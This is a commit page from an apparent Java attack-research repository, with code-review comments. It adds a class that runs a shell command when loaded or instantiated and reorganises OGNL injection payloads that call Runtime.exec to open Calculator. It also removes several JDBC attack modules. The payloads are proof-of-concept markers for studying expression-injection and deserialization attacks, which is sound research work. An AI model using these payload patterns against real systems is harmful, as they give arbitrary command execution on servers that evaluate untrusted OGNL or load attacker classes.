
Commit 7fe48dc

committed
add JDBC Attack :)
1 parent a29e87d commit 7fe48dc

37 files changed

Lines changed: 279 additions & 367 deletions


Lines changed: 22 additions & 0 deletions
@@ -0,0 +1,22 @@
1+
package org.example;
2+
3+
/**
4+
* @author Whoopsunix
5+
*/
6+
public class Exec {
7+
public Exec() {
8+
try {
9+
System.out.println("Exec");
10+
Runtime.getRuntime().exec("open -a Calculator.app");
11+
} catch (Exception e) {
12+
}
13+
}
14+
15+
static {
16+
try {
17+
System.out.println("static Exec");
18+
Runtime.getRuntime().exec("open -a Calculator.app");
19+
} catch (Exception e) {
20+
}
21+
}
22+
}
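Review bot: Both `catch (Exception e) {}` blocks, in the constructor and in the static initializer, discard the failure, so when the `exec` call cannot run (the `open -a Calculator.app` command exists only on macOS) the class prints its marker line and nothing else, and the test output cannot distinguish a failed launch from a successful one. Report the exception in each catch instead, e.g. `System.err.println("Exec marker failed: " + e);`. The class Javadoc carries only `@author`; a sentence such as `Benign marker class for lab tests: prints a line and opens Calculator when instantiated or initialized` would tell a maintainer why the same action appears in two places.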

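--- a/Expression/OGNLAttack/src/main/java/org/example/OGNL.java
+++ b/Expression/OGNLAttack/src/main/java/org/example/OGNL.java
@@ -9,17 +9,14 @@
 public class OGNL {
 
 public static void main(String[] args) {
+new OGNL().getValueDemo();
+}
+
+public void getValueDemo(){
 /**
 * 无回显 get触发
 */
 String baseGetPayload = "@java.lang.Runtime@getRuntime().exec('open -a Calculator.app')";
-// ognlGetValue(baseGetPayload);
-
-/**
-* 无回显 set触发
-*/
-String baseSetPayload = "(@java.lang.Runtime@getRuntime().exec(\'open -a Calculator.app\'))(a)(b)";
-// ognlSetValue(baseSetPayload);
 
 /**
 * Ognl解析后,存在直接打印的情况
@@ -64,10 +61,17 @@ public static void main(String[] args) {
 * todo 类加载
 */
 
-
 Object obj = ognlGetValue(sleep);
+
 System.out.println(obj);
-// ognlSetValue(jsPayloadNormalSet);
+}
+
+public void setValueDemo(){
+/**
+* 无回显 set触发
+*/
+String baseSetPayload = "(@java.lang.Runtime@getRuntime().exec(\'open -a Calculator.app\'))(a)(b)";
+ognlSetValue(baseSetPayload);
 }
 
 /**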
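Review bot: `setValueDemo()` is added in the second hunk but nothing in the visible lines calls it, since `main` now runs only `new OGNL().getValueDemo();`, so the set-trigger sample appears unreachable unless an entry point outside these hunks invokes it. State that on `main`, e.g. `// setValueDemo() is run manually; main only exercises the getValue path`, or pick the demo from `args`. Neither new method has a method-level Javadoc, and the `/** ... */` blocks inside the bodies are not attached to any declaration, so plain `//` comments would be the conventional form there. The `\'` escapes in `baseSetPayload` are unnecessary inside a double-quoted Java string. The body of `getValueDemo` spans the gap between the two hunks and is only partly visible here.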

JDBCAttack/DerbyAttack/pom.xml

Lines changed: 0 additions & 47 deletions
This file was deleted.

JDBCAttack/H2Attack/pom.xml

Lines changed: 0 additions & 63 deletions
This file was deleted.

JDBCAttack/H2Attack/src/main/java/com/example/h2attack/H2AttackApplication.java

Lines changed: 0 additions & 13 deletions
This file was deleted.

JDBCAttack/H2Attack/src/main/resources/application.yml

Lines changed: 0 additions & 6 deletions
This file was deleted.

JDBCAttack/IBMDB2Attack/pom.xml

Lines changed: 0 additions & 24 deletions
This file was deleted.

JDBCAttack/ModeShapeAttack/pom.xml

Lines changed: 0 additions & 23 deletions
This file was deleted.

JDBCAttack/MysqlAttack/pom.xml

Lines changed: 0 additions & 50 deletions
This file was deleted.

JDBCAttack/PostgreSQLAttack/pom.xml

Lines changed: 0 additions & 46 deletions
This file was deleted.
